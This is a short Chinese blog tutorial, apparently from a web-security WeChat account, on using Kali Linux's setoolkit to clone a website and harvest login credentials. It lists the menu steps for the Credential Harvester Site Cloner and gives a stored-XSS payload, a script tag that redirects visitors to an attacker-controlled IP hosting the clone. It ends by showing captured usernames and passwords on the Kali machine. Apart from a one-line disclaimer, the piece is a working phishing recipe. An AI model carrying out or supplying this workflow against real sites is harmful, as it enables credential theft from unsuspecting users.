kali工具 -- setoolkit(克隆网站及利用)

书上说，如果有一天你梦见了一个很久没有见面的人，代表他正在遗忘你。。。

今天给大家介绍一款克隆网站工具：setoolkit

一、环境：kali 2019.04

二、用法：

1、打开终端，输入setoolkit

2、选择Social-Engineering Attacks

3、选择Website Attack Vectors

4、选择Credential Harvester Attack Method

5、选择Site Cloner，输入要克隆的网址

6、构造存在xss漏洞的payload，在存储型xss漏洞处输入下面脚本，提交

<script>window.location="http://192.168.152.171"</script>

7、自动跳转到我们克隆的界面

8、随便输入账号，提交

9、在kali机看到输入的账号和密码

禁止非法，后果自负

欢迎大家关注公众号：web安全工具库